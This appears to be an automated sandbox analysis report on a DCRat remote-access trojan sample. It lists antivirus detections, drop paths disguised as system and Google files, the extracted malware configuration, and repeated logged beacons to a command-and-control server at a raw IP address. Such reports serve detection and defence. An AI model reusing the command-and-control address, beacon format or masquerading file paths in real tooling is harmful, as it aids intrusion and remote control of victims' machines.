Source: http://45.130.42.16/6/api144/9Wp/ |
Avira URL Cloud: Label: malware |
Source: http://45.130.42.16/6/api144/9Wp/ImagevmcpuBigloaddefault.php?MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sd |
Avira URL Cloud: Label: malware |
Source: http://45.130.42.16/6/api144/9Wp/@0xWdhZWZkRWYvx2ZpJUdwNWb2V2Zh1WS |
Avira URL Cloud: Label: malware |
Source: C:\ProgramData\smartscreen.exe |
Avira: detection malicious, Label: HEUR/AGEN.1323342 |
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe |
Avira: detection malicious, Label: HEUR/AGEN.1323342 |
Source: C:\Windows\twain_32\Registry.exe |
Avira: detection malicious, Label: HEUR/AGEN.1323342 |
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe |
Avira: detection malicious, Label: HEUR/AGEN.1323342 |
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe |
Avira: detection malicious, Label: HEUR/AGEN.1323342 |
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe |
Avira: detection malicious, Label: HEUR/AGEN.1323342 |
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe |
Avira: detection malicious, Label: HEUR/AGEN.1323342 |
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe |
Avira: detection malicious, Label: HEUR/AGEN.1323342 |
Source: 0000001C.00000002.1751125350.0000000002C41000.00000004.00000800.00020000.00000000.sdmp |
Malware Configuration Extractor: DCRat {"SCRT": "{\"j\":\">\",\"l\":\";\",\"u\":\" \",\"W\":\"@\",\"V\":\".\",\"k\":\"-\",\"O\":\"*\",\"H\":\"#\",\"D\":\"%\",\"5\":\"`\",\"p\":\"~\",\"d\":\")\",\"A\":\",\",\"M\":\"!\",\"8\":\"<\",\"N\":\"&\",\"i\":\"$\",\"I\":\"^\",\"4\":\"|\",\"2\":\"(\",\"w\":\"_\"}", "PCRT": "{\"i\":\"(\",\"I\":\"@\",\"d\":\"_\",\"6\":\"^\",\"0\":\"$\",\"c\":\"!\",\"R\":\"%\",\"9\":\" \",\"j\":\"#\",\"w\":\")\",\"G\":\">\",\"y\":\"-\",\"Y\":\"*\",\"b\":\";\",\"l\":\"`\",\"=\":\".\",\"U\":\"<\",\"n\":\"~\",\"p\":\"|\",\"T\":\"&\",\"S\":\",\"}", "TAG": "", "MUTEX": "DCR_MUTEX-6cV1joJwieGuWPhbIJ4v", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://45.130.42.16/6/api144/9Wp/@0xWdhZWZkRWYvx2ZpJUdwNWb2V2Zh1WS", "H2": "http://45.130.42.16/6/api144/9Wp/@0xWdhZWZkRWYvx2ZpJUdwNWb2V2Zh1WS", "T": "0"} |
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe |
ReversingLabs: Detection: 81% |
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe |
ReversingLabs: Detection: 81% |
Source: C:\ProgramData\smartscreen.exe |
ReversingLabs: Detection: 81% |
Source: C:\Recovery\RRVGfHJzvQMYfWe.exe |
ReversingLabs: Detection: 81% |
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe |
ReversingLabs: Detection: 81% |
Source: C:\Windows\PLA\Templates\RRVGfHJzvQMYfWe.exe |
ReversingLabs: Detection: 81% |
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe |
ReversingLabs: Detection: 81% |
Source: C:\Windows\twain_32\Registry.exe |
ReversingLabs: Detection: 81% |
Source: 13ZNp2xvRU.exe |
ReversingLabs: Detection: 81% |
Source: C:\ProgramData\smartscreen.exe |
Joe Sandbox ML: detected |
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe |
Joe Sandbox ML: detected |
Source: C:\Windows\twain_32\Registry.exe |
Joe Sandbox ML: detected |
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe |
Joe Sandbox ML: detected |
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe |
Joe Sandbox ML: detected |
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe |
Joe Sandbox ML: detected |
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe |
Joe Sandbox ML: detected |
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe |
Joe Sandbox ML: detected |
Source: 13ZNp2xvRU.exe |
Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE |
Source: 13ZNp2xvRU.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Source: Malware configuration extractor |
URLs: http://45.130.42.16/6/api144/9Wp/@0xWdhZWZkRWYvx2ZpJUdwNWb2V2Zh1WS |
Source: Joe Sandbox View |
ASN Name: BEGET-ASRU BEGET-ASRU |
Source: global traffic |
HTTP traffic detected: GET /6/api144/9Wp/ImagevmcpuBigloaddefault.php?MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sdAGnXlB32J1ShQkF4bQMIgaE=RxpzDDZhVciR8tTxpjA20z&223505adc80271978c1edbb4eca1c18c=d7a9900f45d34dd9122c7526d5dd4ee1&550e331da9a15a3997b38874465fab05=gNjdzMlNWOwgDOiljZ5kDZ3UjNhZmZjlzMlJmNkBTOkFWM3YjNihDZ&MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sdAGnXlB32J1ShQkF4bQMIgaE=RxpzDDZhVciR8tTxpjA20z HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 45.130.42.16Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /6/api144/9Wp/ImagevmcpuBigloaddefault.php?MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sdAGnXlB32J1ShQkF4bQMIgaE=RxpzDDZhVciR8tTxpjA20z&223505adc80271978c1edbb4eca1c18c=d7a9900f45d34dd9122c7526d5dd4ee1&550e331da9a15a3997b38874465fab05=gNjdzMlNWOwgDOiljZ5kDZ3UjNhZmZjlzMlJmNkBTOkFWM3YjNihDZ&MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sdAGnXlB32J1ShQkF4bQMIgaE=RxpzDDZhVciR8tTxpjA20z HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: global traffic |
HTTP traffic detected: GET /6/api144/9Wp/ImagevmcpuBigloaddefault.php?MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sdAGnXlB32J1ShQkF4bQMIgaE=RxpzDDZhVciR8tTxpjA20z&223505adc80271978c1edbb4eca1c18c=d7a9900f45d34dd9122c7526d5dd4ee1&550e331da9a15a3997b38874465fab05=gNjdzMlNWOwgDOiljZ5kDZ3UjNhZmZjlzMlJmNkBTOkFWM3YjNihDZ&MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sdAGnXlB32J1ShQkF4bQMIgaE=RxpzDDZhVciR8tTxpjA20z HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 45.130.42.16Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /6/api144/9Wp/ImagevmcpuBigloaddefault.php?MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sdAGnXlB32J1ShQkF4bQMIgaE=RxpzDDZhVciR8tTxpjA20z&223505adc80271978c1edbb4eca1c18c=d7a9900f45d34dd9122c7526d5dd4ee1&550e331da9a15a3997b38874465fab05=gNjdzMlNWOwgDOiljZ5kDZ3UjNhZmZjlzMlJmNkBTOkFWM3YjNihDZ&MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sdAGnXlB32J1ShQkF4bQMIgaE=RxpzDDZhVciR8tTxpjA20z HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 45.130.42.16 |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Apr 2024 20:42:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 177375Connection: keep-aliveP3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"X-Powered-CMS: Bitrix Site Manager (3cb6b699f91fcd1677ea8a5f7bcf940b)Set-Cookie: PHPSESSID=0joeWo8FC3UGG5G1KO2ZvI0cw6MJJJdg; path=/; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: BITRIX_SM_GUEST_ID=2289526; expires=Fri, 18-Apr-2025 20:42:03 GMT; Max-Age=31104000; path=/Set-Cookie: BITRIX_SM_LAST_VISIT=23.04.2024%2023%3A42%3A03; expires=Fri, 18-Apr-2025 20:42:03 GMT; Max-Age=31104000; path=/Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 b6 d0 b5 d0 bd d1 81 d0 ba d0 b0 d1 8f 20 d0 be d0 b4 d0 b5 d0 b6 d0 b4 d0 b0 2c 20 d0 bc d1 83 d0 b6 d1 81 d0 ba d0 b0 d1 8f 20 d0 be d0 b4 d0 b5 d0 b6 d0 b4 d0 b0 2c 20 d1 81 d0 bf d0 be d1 80 d1 82 d0 b8 d0 b2 d0 bd d0 b0 d1 8f 20 d0 be d0 b4 d0 b5 d0 b6 d0 b4 d0 b0 2c 20 d1 82 d0 b0 d0 bf d0 be d1 87 d0 ba d0 b8 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 9c d1 8b 20 d0 bf d1 80 d0 b5 d0 b4 d0 bb d0 b0 d0 b3 d0 b0 d0 b5 d0 bc 20 d1 88 d0 b8 d1 80 d0 be d0 ba d0 b8 d0 b9 20 d0 b0 d1 81 d1 81 d0 be d1 80 d1 82 d0 b8 d0 bc d0 b5 d0 bd d1 82 20 d0 ba d0 b0 d1 87 Data Ascii: <!DOCTYPE html><html lang="ru"><head> <meta name="viewport" content="width=device-width, initial-scale=1.0 |